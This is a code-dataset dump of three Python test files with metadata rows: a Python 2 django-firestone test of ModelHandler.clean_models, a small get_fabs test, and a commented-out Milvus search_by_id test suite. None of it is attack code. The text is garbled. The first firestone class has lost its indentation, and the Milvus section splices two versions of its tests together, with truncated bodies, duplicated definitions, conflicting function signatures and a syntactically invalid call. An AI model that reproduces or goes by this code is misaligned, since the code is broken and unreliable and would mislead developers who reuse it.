|
2017-03-08T22:58:35.000Z
|
2017-03-08T22:58:35.000Z
|
testproject/testapp/tests/test_handlers_clean_models.py
|
movermeyer/django-firestone
|
e045089f6ff4a6686633f9c5909c314a010bd4a0
|
[
"WTFPL"
] | null | null | null |
testproject/testapp/tests/test_handlers_clean_models.py
|
movermeyer/django-firestone
|
e045089f6ff4a6686633f9c5909c314a010bd4a0
|
[
"WTFPL"
] | 1
|
2018-03-05T17:40:55.000Z
|
2018-03-05T17:40:55.000Z
|
"""
This module tests the ``firestone.handlers.ModelHandler.clean_models`` method.
"""
from firestone.handlers import ModelHandler
from firestone import exceptions
from django.test import TestCase
from django.test import RequestFactory
from django.contrib.auth.models import User
from django.core.exceptions import ValidationError
from django.core.exceptions import NON_FIELD_ERRORS
from model_mommy import mommy
def init_handler(handler, request, *args, **kwargs):
# Mimicking the initialization of the handler instance
handler.request = request
handler.args = args
handler.kwargs = kwargs
return handler
class TestCleanModelsSingleModel(TestCase):
def setUp(self):
request = RequestFactory().post('/')
handler = init_handler(ModelHandler(), request)
handler.model = User
self.handler = handler
mommy.make(User, 10)
def test_correct(self):
handler = self.handler
handler.request.data = User.objects.get(id=1)
handler.clean_models()
def test_invalid_field_values(self):
"""
We will set some invalid field values.
Are errors raised by model.clean_fields() handled correctly?
They should raise a ``exceptions.BadRequest`` exception
"""
handler = self.handler
handler.request.data = User.objects.get(id=1)
# I set some invalid values for some fields
handler.request.data.username = ''
handler.request.data.password = ''
# Does ``clean_models`` raise the correct exception?
self.assertRaises(
exceptions.BadRequest,
handler.clean_models,
)
# Does the exception ``errors`` attribute include a dictionary with the correct keys?
try:
handler.clean_models()
except exceptions.BadRequest, e:
self.assertIsInstance(e.errors, dict)
self.assertItemsEqual(e.errors.keys(), ('username', 'password'))
else:
assert(False)
def test_invalid_general(self):
"""
We will make the model's clean() method to raise some ValidationError.
Are errors raised by model.clean() handler correctly?
They should raise a ``exceptions.BadRequest`` exception.
"""
old_clean = User.clean
def new_clean(self):
raise ValidationError('Error string')
User.clean = new_clean
handler = self.handler
handler.request.data = User.objects.get(id=1)
# Does ``clean_models`` raise the correct exception?
self.assertRaises(
exceptions.BadRequest,
handler.clean_models,
)
# Does the exception ``errors`` attribute include a dictionary of the
# correct form?
try:
handler.clean_models()
except exceptions.BadRequest, e:
self.assertIsInstance(e.errors, dict)
self.assertEqual(e.errors[NON_FIELD_ERRORS][0], 'Error string')
else:
assert(False)
User.clean = old_clean
class TestCleanModelsQueryset(TestCase):
    """
    Validate ``ModelHandler.clean_models`` when ``request.data`` is a queryset.

    Errors on some model instance in a queryset will behave exactly as in the
    case of a single model instance: any ``ValidationError`` raised while
    cleaning is translated into an ``exceptions.BadRequest`` whose ``errors``
    attribute is a dict of field name -> error messages.

    NOTE(review): this code uses Python 2-only syntax (``except Exc, e:``)
    and the Python 2 ``assertItemsEqual`` API; it will not run unmodified
    on Python 3.
    """
    def setUp(self):
        # Build a POST request, attach it to a fresh ModelHandler operating
        # on the User model, and seed the database with 10 User rows.
        request = RequestFactory().post('/')
        handler = init_handler(ModelHandler(), request)
        handler.model = User
        self.handler = handler
        mommy.make(User, 10)
    def test_correct(self):
        # A queryset of valid instances should pass cleaning without raising.
        handler = self.handler
        handler.request.data = User.objects.all()
        handler.clean_models()
        assert(True)
    def test_invalid_field_values(self):
        """
        We will set some invalid field values.
        Are errors raised by model.clean_fields() handled correctly?
        They should raise a ``exceptions.BadRequest`` exception
        """
        handler = self.handler
        handler.request.data = User.objects.all()
        # I set some invalid values for some fields of every instance
        for item in handler.request.data:
            item.username = ''
            item.password = ''
        # Does ``clean_models`` raise the correct exception?
        self.assertRaises(
            exceptions.BadRequest,
            handler.clean_models,
        )
        # Does the exception ``errors`` attribute include a dictionary with the correct keys?
        try:
            handler.clean_models()
        except exceptions.BadRequest, e:
            self.assertIsInstance(e.errors, dict)
            self.assertItemsEqual(e.errors.keys(), ('username', 'password'))
        else:
            # clean_models() must not succeed with invalid field values.
            assert(False)
    def test_invalid_general(self):
        """
        We will make the model's clean() method raise some ValidationError.
        Are errors raised by model.clean() handled correctly?
        They should raise a ``exceptions.BadRequest`` exception.
        """
        # Monkeypatch User.clean so that every instance fails model-level
        # (non-field) validation; the original is restored at the end.
        old_clean = User.clean
        def new_clean(self):
            raise ValidationError('Error string')
        User.clean = new_clean
        handler = self.handler
        handler.request.data = User.objects.all()
        # Does ``clean_models`` raise the correct exception?
        self.assertRaises(
            exceptions.BadRequest,
            handler.clean_models,
        )
        # Does the exception ``errors`` attribute include a dictionary of the
        # correct form?  Non-field errors are keyed under NON_FIELD_ERRORS.
        try:
            handler.clean_models()
        except exceptions.BadRequest, e:
            self.assertIsInstance(e.errors, dict)
            self.assertEqual(e.errors[NON_FIELD_ERRORS][0], 'Error string')
        else:
            # clean_models() must not succeed while clean() always raises.
            assert(False)
        # Restore the original clean() so later tests are unaffected.
        User.clean = old_clean
| 32.224719
| 93
| 0.622385
| 625
| 5,736
| 5.6368
| 0.1792
| 0.046835
| 0.051093
| 0.042577
| 0.788249
| 0.771218
| 0.771218
| 0.771218
| 0.751916
| 0.749361
| 0
| 0.00221
| 0.290098
| 5,736
| 177
| 94
| 32.40678
| 0.862967
| 0.120293
| 0
| 0.766355
| 0
| 0
| 0.020588
| 0
| 0
| 0
| 0
| 0
| 0.158879
| 0
| null | null | 0.037383
| 0.074766
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2b97267d4b2fd15c97587c01b24808efb22f130b
| 151
|
py
|
Python
|
tests/test_tmp.py
|
wisererik/service_catalog
|
792a9cbc50fb3fdfec6cc93bb43f36bcdd3ea96d
|
[
"Apache-2.0"
] | null | null | null |
tests/test_tmp.py
|
wisererik/service_catalog
|
792a9cbc50fb3fdfec6cc93bb43f36bcdd3ea96d
|
[
"Apache-2.0"
] | null | null | null |
tests/test_tmp.py
|
wisererik/service_catalog
|
792a9cbc50fb3fdfec6cc93bb43f36bcdd3ea96d
|
[
"Apache-2.0"
] | null | null | null |
from orchestration.tmp import get_fabs
def test_get_fabs():
    """get_fabs returns the absolute value for zero, negative and float inputs."""
    cases = [
        (0, 0),
        (-1, 1),
        (1.1, 1.1),
    ]
    for value, expected in cases:
        assert get_fabs(value) == expected
| 18.875
| 38
| 0.662252
| 27
| 151
| 3.481481
| 0.407407
| 0.37234
| 0.414894
| 0.297872
| 0.319149
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067227
| 0.211921
| 151
| 7
| 39
| 21.571429
| 0.722689
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.6
| 1
| 0.2
| true
| 0
| 0.2
| 0
| 0.4
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2b9b022627322ee694fdbb7550fd482ff769c0f7
| 42,912
|
py
|
Python
|
tests/milvus_python_test/test_search_by_id.py
|
ggaaooppeenngg/milvus
|
04db47fa664cf3c0eecb894592810c153854794c
|
[
"Apache-2.0"
] | 1
|
2021-10-01T18:16:34.000Z
|
2021-10-01T18:16:34.000Z
|
tests/milvus_python_test/test_search_by_id.py
|
weishuo2/milvus
|
2e60bc7361362089caa6ae01899bbc55cf41b4b0
|
[
"Apache-2.0"
] | 1
|
2020-04-23T03:56:44.000Z
|
2020-04-23T03:56:44.000Z
|
tests/milvus_python_test/test_search_by_id.py
|
weishuo2/milvus
|
2e60bc7361362089caa6ae01899bbc55cf41b4b0
|
[
"Apache-2.0"
] | 2
|
2020-03-02T05:16:57.000Z
|
2020-03-04T06:05:55.000Z
|
# import pdb
# import copy
# import struct
# import pytest
# import threading
# import datetime
# import logging
# from time import sleep
# from multiprocessing import Process
# import numpy
# from milvus import Milvus, IndexType, MetricType
# from utils import *
# dim = 128
# collection_id = "test_search"
# add_interval_time = 2
# vectors = gen_vectors(6000, dim)
# # vectors /= numpy.linalg.norm(vectors)
# # vectors = vectors.tolist()
# nprobe = 1
# epsilon = 0.001
# tag = "overallpaper"
# top_k = 5
# nprobe = 1
# non_exist_id = 9527
# small_size = 6000
# raw_vectors, binary_vectors = gen_binary_vectors(6000, dim)
# class TestSearchBase:
# @pytest.fixture(scope="function", autouse=True)
# def skip_check(self, connect):
# if str(connect._cmd("mode")[1]) == "GPU":
# reason = "GPU mode not support"
# logging.getLogger().info(reason)
# pytest.skip(reason)
# def init_data(self, connect, collection, nb=6000):
# '''
# Generate vectors and add it in collection, before search vectors
# '''
# global vectors
# if nb == 6000:
# add_vectors = vectors
# else:
# add_vectors = gen_vectors(nb, dim)
# status, ids = connect.add_vectors(collection, add_vectors)
# sleep(add_interval_time)
# return add_vectors, ids
# def init_data_binary(self, connect, collection, nb=6000):
# '''
# Generate vectors and add it in collection, before search vectors
# '''
# global binary_vectors
# if nb == 6000:
# add_vectors = binary_vectors
# else:
# add_vectors = gen_binary_vectors(nb, dim)
# status, ids = connect.add_vectors(collection, add_vectors)
# sleep(add_interval_time)
# return add_vectors, ids
# def init_data_no_flush(self, connect, collection, nb=6000):
# global vectors
# if nb == 6000:
# add_vectors = vectors
# else:
# add_vectors = gen_vectors(nb, dim)
# status, ids = connect.add_vectors(collection, add_vectors)
# # sleep(add_interval_time)
# return add_vectors, ids
# def init_data_no_flush_ids(self, connect, collection, nb=6000):
# global vectors
# my_ids = [i for i in range(nb)]
# if nb == 6000:
# add_vectors = vectors
# else:
# add_vectors = gen_vectors(nb, dim)
# status, ids = connect.add_vectors(collection, add_vectors, my_ids)
# # sleep(add_interval_time)
# return add_vectors, ids
# def init_data_ids(self, connect, collection, nb=6000):
# global vectors
# my_ids = [i for i in range(nb)]
# if nb == 6000:
# add_vectors = vectors
# else:
# add_vectors = gen_vectors(nb, dim)
# status, ids = connect.add_vectors(collection, add_vectors, my_ids)
# sleep(add_interval_time)
# return add_vectors, ids
# def add_data(self, connect, collection, vectors):
# '''
# Add specified vectors to collection
# '''
# status, ids = connect.add_vectors(collection, vectors)
# # sleep(add_interval_time)
# sleep(10)
# return vectors, ids
# def add_data_ids(self, connect, collection, vectors):
# my_ids = [i for i in range(len(vectors))]
# status, ids = connect.add_vectors(collection, vectors, my_ids)
# sleep(add_interval_time)
# return vectors, ids
# def add_data_and_flush(self, connect, collection, vectors):
# status, ids = connect.add_vectors(collection, vectors)
# connect.flush([collection])
# return vectors, ids
# def add_data_and_flush_ids(self, connect, collection, vectors):
# my_ids = [i for i in range(len(vectors))]
# status, ids = connect.add_vectors(collection, vectors, my_ids)
# connect.flush([collection])
# return vectors, ids
# def add_data_no_flush(self, connect, collection, vectors):
# '''
# Add specified vectors to collection
# '''
# status, ids = connect.add_vectors(collection, vectors)
# return vectors, ids
# def add_data_no_flush_ids(self, connect, collection, vectors):
# my_ids = [i for i in range(len(vectors))]
# status, ids = connect.add_vectors(collection, vectors, my_ids)
# return vectors, ids
# # delete data and auto flush - timeout due to the flush interval in config file
# def delete_data(self, connect, collection, ids):
# '''
# delete vectors by id
# '''
# status = connect.delete_by_id(collection, ids)
# sleep(add_interval_time)
# return status
# # delete data and auto flush - timeout due to the flush interval in config file
# def delete_data_no_flush(self, connect, collection, ids):
# '''
# delete vectors by id
# '''
# status = connect.delete_by_id(collection, ids)
# return status
# # delete data and manual flush
# def delete_data_and_flush(self, connect, collection, ids):
# '''
# delete vectors by id
# '''
# status = connect.delete_by_id(collection, ids)
# connect.flush([collection])
# return status
# def check_no_result(self, results):
# if len(results) == 0:
# return True
# flag = True
# for r in results:
# flag = flag and (r.id == -1)
# if not flag:
# return False
# return flag
# def init_data_partition(self, connect, collection, partition_tag, nb=6000):
# '''
# Generate vectors and add it in collection, before search vectors
# '''
# global vectors
# if nb == 6000:
# add_vectors = vectors
# else:
# add_vectors = gen_vectors(nb, dim)
# # add_vectors /= numpy.linalg.norm(add_vectors)
# # add_vectors = add_vectors.tolist()
# status, ids = connect.add_vectors(collection, add_vectors, partition_tag=partition_tag)
# sleep(add_interval_time)
# return add_vectors, ids
# def init_data_and_flush(self, connect, collection, nb=6000):
# '''
# Generate vectors and add it in collection, before search vectors
# '''
# global vectors
# if nb == 6000:
# add_vectors = vectors
# else:
# add_vectors = gen_vectors(nb, dim)
# # add_vectors /= numpy.linalg.norm(add_vectors)
# # add_vectors = add_vectors.tolist()
# status, ids = connect.add_vectors(collection, add_vectors)
# connect.flush([collection])
# return add_vectors, ids
# def init_data_and_flush_ids(self, connect, collection, nb=6000):
# global vectors
# my_ids = [i for i in range(nb)]
# if nb == 6000:
# add_vectors = vectors
# else:
# add_vectors = gen_vectors(nb, dim)
# status, ids = connect.add_vectors(collection, add_vectors, my_ids)
# connect.flush([collection])
# return add_vectors, ids
# def init_data_partition_and_flush(self, connect, collection, partition_tag, nb=6000):
# '''
# Generate vectors and add it in collection, before search vectors
# '''
# global vectors
# if nb == 6000:
# add_vectors = vectors
# else:
# add_vectors = gen_vectors(nb, dim)
# # add_vectors /= numpy.linalg.norm(add_vectors)
# # add_vectors = add_vectors.tolist()
# status, ids = connect.add_vectors(collection, add_vectors, partition_tag=partition_tag)
# connect.flush([collection])
# return add_vectors, ids
# @pytest.fixture(
# scope="function",
# params=gen_simple_index()
# )
# def get_simple_index(self, request, connect):
# if request.param["index_type"] not in [IndexType.FLAT, IndexType.IVF_FLAT, IndexType.IVF_SQ8]:
# pytest.skip("Skip PQ Temporary")
# return request.param
# @pytest.fixture(
# scope="function",
# params=gen_simple_index()
# )
# def get_jaccard_index(self, request, connect):
#
# @pytest.fixture(
# scope="function",
# params=gen_simple_index_params()
# )
# def get_simple_index_params(self, request, connect):
# if request.param["index_type"] not in [IndexType.FLAT, IndexType.IVF_FLAT, IndexType.IVF_SQ8]:
# pytest.skip("Skip PQ Temporary")
# return request.param
#
# @pytest.fixture(
# scope="function",
# params=gen_simple_index_params()
# )
# def get_jaccard_index_params(self, request, connect):
# logging.getLogger().info(request.param)
# if request.param["index_type"] == IndexType.IVFLAT or request.param["index_type"] == IndexType.FLAT:
# return request.param
# else:
# pytest.skip("Skip index Temporary")
# @pytest.fixture(
# scope="function",
# params=gen_simple_index()
# )
# def get_hamming_index(self, request, connect):
#
# @pytest.fixture(
# scope="function",
# params=gen_simple_index_params()
# )
# def get_hamming_index_params(self, request, connect):
# logging.getLogger().info(request.param)
# if request.param["index_type"] == IndexType.IVFLAT or request.param["index_type"] == IndexType.FLAT:
# return request.param
# else:
# pytest.skip("Skip index Temporary")
# """
# generate top-k params
# """
# @pytest.fixture(
# scope="function",
# params=[1, 99, 1024, 2048]
# )
# def get_top_k(self, request):
# yield request.param
# # auto flush
# def test_search_flat_normal_topk(self, connect, collection, get_top_k):
# '''
# target: test basic search fuction, all the search params is corrent, change top-k value
# method: search with the given vector id, check the result
# expected: search status ok, and the length of the result is top_k
# '''
# top_k = get_top_k
# vectors, ids = self.init_data(connect, collection, nb=small_size)
# query_id = ids[0]
# status, result = connect.search_by_id(collection, top_k, query_id, params={})
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
# assert result[0][0].distance <= epsilon
# assert check_result(result[0], ids[0])
# def test_search_flat_max_topk(self, connect, collection):
# '''
# target: test basic search fuction, all the search params is corrent, change top-k value
# method: search with the given vector id, check the result
# expected: search status ok, and the length of the result is top_k
# '''
# top_k = 2049
# vectors, ids = self.init_data(connect, collection, nb=small_size)
# query_id = ids[0]
# status, result = connect.search_by_id(collection, top_k, query_id, params={})
# assert not status.OK()
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert not status.OK()
#
# def test_search_id_not_existed(self, connect, collection):
# '''
# target: test basic search fuction, all the search params is corrent, change top-k value
# method: search with the given vector id, check the result
# expected: search status ok, and the length of the result is top_k
# '''
# vectors, ids = self.init_data_and_flush(connect, collection, nb=small_size)
# query_id = non_exist_id
# status, result = connect.search_by_id(collection, top_k, query_id, params={})
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
#
# # auto flush
# def test_search_ids(self, connect, collection):
# vectors, ids = self.init_data_ids(connect, collection, nb=small_size)
# query_id = ids[0]
# status, result = connect.search_by_id(collection, top_k, query_id, params={})
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
# assert result[0][0].distance <= epsilon
# assert check_result(result[0], ids[0])
# # manual flush
# def test_search_ids_flush(self, connect, collection):
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# query_id = non_exist_id
# status, result = connect.search_by_id(collection, top_k, query_id, params={})
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
# assert self.check_no_result(result[0])
# # ------------------------------------------------------------- l2, add manual flush, delete, search ------------------------------------------------------------- #
# # ids, manual flush, search collection, exist
# def test_search_index_l2(self, connect, collection, get_simple_index):
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
# assert self.check_no_result(result[0])
#
# # ------------------------------------------------------------- l2, add manual flush, delete, search ------------------------------------------------------------- #
# # ids, manual flush, search collection, exist
# def test_search_index_l2(self, connect, collection, get_simple_index_params):
# '''
# target: test basic search fuction, all the search params is corrent, test all index params, and build
# method: search with the given vectors, check the result
# expected: search status ok, and the length of the result is top_k
# '''
# index_param = get_simple_index["index_param"]
# index_type = get_simple_index["index_type"]
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_type, index_param)
# query_id = ids[0]
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(collection, top_k, query_id, params=search_param)
# index_params = get_simple_index_params
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_params)
# query_id = ids[0]
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
# assert result[0][0].distance <= epsilon
# assert check_result(result[0], ids[0])
# # ids, manual flush, search collection, non exist
# def test_search_index_l2_id_not_existed(self, connect, collection, get_simple_index):
#
# # ids, manual flush, search collection, non exist
# def test_search_index_l2_id_not_existed(self, connect, collection, get_simple_index_params):
# '''
# target: test basic search fuction, all the search params is corrent, test all index params, and build
# method: search with the given vectors, check the result
# expected: search status ok, and the length of the result is top_k
# '''
# index_param = get_simple_index["index_param"]
# index_type = get_simple_index["index_type"]
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_type, index_param)
# query_id = non_exist_id
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(collection, top_k, query_id, params=search_param)
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
# # ids, manual flush, delete, manual flush, search collection, exist
# def test_search_index_delete(self, connect, collection, get_simple_index):
# index_param = get_simple_index["index_param"]
# index_type = get_simple_index["index_type"]
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_type, index_param)
# query_id = ids[0]
# status = self.delete_data_and_flush(connect, collection, [query_id])
# assert status.OK()
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(collection, top_k, query_id, params=search_param)
# assert status.OK()
# assert self.check_no_result(result[0])
# # ids, manual flush, delete, manual flush, search collection, non exist
# def test_search_index_delete_id_not_existed(self, connect, collection, get_simple_index):
# index_param = get_simple_index["index_param"]
# index_type = get_simple_index["index_type"]
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_type, index_param)
# index_params = get_simple_index_params
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_params)
# query_id = non_exist_id
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
#
# # ids, manual flush, delete, manual flush, search collection, exist
# def test_search_index_delete(self, connect, collection, get_simple_index_params):
# index_params = get_simple_index_params
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_params)
# query_id = ids[0]
# status = self.delete_data_and_flush(connect, collection, [query_id])
# assert status.OK()
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert status.OK()
# assert self.check_no_result(result[0])
#
# # ids, manual flush, delete, manual flush, search collection, non exist
# def test_search_index_delete_id_not_existed(self, connect, collection, get_simple_index_params):
# index_params = get_simple_index_params
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_params)
# query_id = ids[0]
# status = self.delete_data_and_flush(connect, collection, [query_id])
# assert status.OK()
# query_id = non_exist_id
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(collection, top_k, query_id, params=search_param)
# assert status.OK()
# assert self.check_no_result(result[0])
# def test_search_index_delete_no_flush(self, connect, collection, get_simple_index):
# index_param = get_simple_index["index_param"]
# index_type = get_simple_index["index_type"]
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_type, index_param)
# query_id = ids[0]
# status = self.delete_data_no_flush(connect, collection, [query_id])
# assert status.OK()
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(collection, top_k, query_id, params=search_param)
# assert status.OK()
# assert check_result(result[0], query_id)
# # ids, manual flush, delete, no flush, search collection, non exist
# def test_search_index_delete_no_flush_id_not_existed(self, connect, collection, get_simple_index):
# index_param = get_simple_index["index_param"]
# index_type = get_simple_index["index_type"]
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_type, index_param)
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert status.OK()
# assert self.check_no_result(result[0])
#
# def test_search_index_delete_no_flush(self, connect, collection, get_simple_index_params):
# index_params = get_simple_index_params
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_params)
# query_id = ids[0]
# status = self.delete_data_no_flush(connect, collection, [query_id])
# assert status.OK()
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert status.OK()
# assert check_result(result[0], query_id)
#
# # ids, manual flush, delete, no flush, search collection, non exist
# def test_search_index_delete_no_flush_id_not_existed(self, connect, collection, get_simple_index_params):
# index_params = get_simple_index_params
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_params)
# query_id = ids[0]
# status = self.delete_data_no_flush(connect, collection, [query_id])
# assert status.OK()
# query_id = non_exist_id
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(collection, top_k, query_id, params=search_param)
# assert status.OK()
# assert self.check_no_result(result[0])
# def test_search_index_delete_add(self, connect, collection, get_simple_index):
# index_param = get_simple_index["index_param"]
# index_type = get_simple_index["index_type"]
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_type, index_param)
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert status.OK()
# assert self.check_no_result(result[0])
#
# def test_search_index_delete_add(self, connect, collection, get_simple_index_params):
# index_params = get_simple_index_params
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_params)
# query_id = ids[0]
# status = self.delete_data_no_flush(connect, collection, [query_id])
# assert status.OK()
# vectors, new_ids = self.add_data_and_flush_ids(connect, collection, vectors)
# status = connect.create_index(collection, index_type, index_param)
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(collection, top_k, query_id, params=search_param)
# status = connect.create_index(collection, index_params)
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
# assert result[0][0].distance <= epsilon
# assert check_result(result[0], query_id)
# status = self.delete_data_no_flush(connect, collection, [query_id])
# assert status.OK()
# # add to collection, auto flush, search collection, search partition exist
# def test_search_l2_index_partition(self, connect, collection, get_simple_index):
#
# # add to collection, auto flush, search collection, search partition exist
# def test_search_l2_index_partition(self, connect, collection, get_simple_index_params):
# '''
# target: test basic search fuction, all the search params is corrent, test all index params, and build
# method: add vectors into collection, search with the given vectors, check the result
# expected: search status ok, and the length of the result is top_k, search collection with partition tag return empty
# '''
# index_param = get_simple_index["index_param"]
# index_type = get_simple_index["index_type"]
# status = connect.create_partition(collection, tag)
# vectors, ids = self.init_data(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_type, index_param)
# query_id = ids[0]
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(collection, top_k, query_id, params=search_param)
# index_params = get_simple_index_params
# status = connect.create_partition(collection, tag)
# vectors, ids = self.init_data(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_params)
# query_id = ids[0]
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
# assert check_result(result[0], ids[0])
# assert result[0][0].distance <= epsilon
# status, result = connect.search_by_id(collection, top_k, query_id, partition_tags=[tag], params=search_param)
# assert status.OK()
# assert len(result) == 0
# # add to partition, auto flush, search partition exist
# def test_search_l2_index_params_partition_2(self, connect, collection, get_simple_index):
# index_param = get_simple_index["index_param"]
# index_type = get_simple_index["index_type"]
# status = connect.create_partition(collection, tag)
# vectors, ids = self.init_data_partition(connect, collection, tag, nb=small_size)
# status = connect.create_index(collection, index_type, index_param)
# query_id = ids[0]
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(collection, top_k, query_id, partition_tags=[tag], params=search_param)
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
# assert check_result(result[0], query_id)
# def test_search_l2_index_partition_id_not_existed(self, connect, collection, get_simple_index):
# index_param = get_simple_index["index_param"]
# index_type = get_simple_index["index_type"]
# status = connect.create_partition(collection, tag)
# vectors, ids = self.init_data(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_type, index_param)
# query_id = non_exist_id
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(collection, top_k, query_id, partition_tags=[tag], params=search_param)
# assert status.OK()
# assert len(result) == 0
# # add to collection, manual flush, search non-existing partition non exist
# def test_search_l2_index_partition_tag_not_existed(self, connect, collection, get_simple_index):
# index_param = get_simple_index["index_param"]
# index_type = get_simple_index["index_type"]
# status = connect.create_partition(collection, tag)
# vectors, ids = self.init_data_partition_and_flush(connect, collection, tag, nb=small_size)
# status = connect.create_index(collection, index_type, index_param)
# query_id = non_exist_id
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(collection, top_k, query_id, partition_tags=['non_existing_tag'], params=search_param)
# assert status.OK()
# assert len(result) == 0
# def test_search_l2_index_partitions(self, connect, collection, get_simple_index):
# new_tag = "new_tag"
# index_param = get_simple_index["index_param"]
# index_type = get_simple_index["index_type"]
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id, partition_tag_array=[tag])
# assert status.OK()
# assert len(result) == 0
#
# # add to partition, auto flush, search partition exist
# def test_search_l2_index_params_partition_2(self, connect, collection, get_simple_index_params):
# index_params = get_simple_index_params
# status = connect.create_partition(collection, tag)
# vectors, ids = self.init_data_partition(connect, collection, tag, nb=small_size)
# status = connect.create_index(collection, index_params)
# query_id = ids[0]
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id, partition_tag_array=[tag])
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
# assert check_result(result[0], query_id)
#
# def test_search_l2_index_partition_id_not_existed(self, connect, collection, get_simple_index_params):
# index_params = get_simple_index_params
# status = connect.create_partition(collection, tag)
# vectors, ids = self.init_data(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_params)
# query_id = non_exist_id
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id, partition_tag_array=[tag])
# assert status.OK()
# assert len(result) == 0
#
# # add to collection, manual flush, search non-existing partition non exist
# def test_search_l2_index_partition_tag_not_existed(self, connect, collection, get_simple_index_params):
# index_params = get_simple_index_params
# status = connect.create_partition(collection, tag)
# vectors, ids = self.init_data_partition_and_flush(connect, collection, tag, nb=small_size)
# status = connect.create_index(collection, index_params)
# query_id = non_exist_id
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id, partition_tag_array=['non_existing_tag'])
# assert status.OK()
# assert len(result) == 0
#
# def test_search_l2_index_partitions(self, connect, collection, get_simple_index_params):
# new_tag = "new_tag"
# index_params = get_simple_index_params
# status = connect.create_partition(collection, tag)
# status = connect.create_partition(collection, new_tag)
# vectors, ids = self.init_data_partition_and_flush(connect, collection, tag, nb=small_size)
# vectors, new_ids = self.init_data_partition_and_flush(connect, collection, new_tag, nb=small_size)
# status = connect.create_index(collection, index_type, index_param)
# query_id = ids[0]
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(collection, top_k, query_id, partition_tags=[tag, new_tag], search_param)
# status = connect.create_index(collection, index_params)
# query_id = ids[0]
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id, partition_tag_array=[tag, new_tag])
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
# assert check_result(result[0], ids[0])
# assert result[0][0].distance <= epsilon
# query_id = new_ids[0]
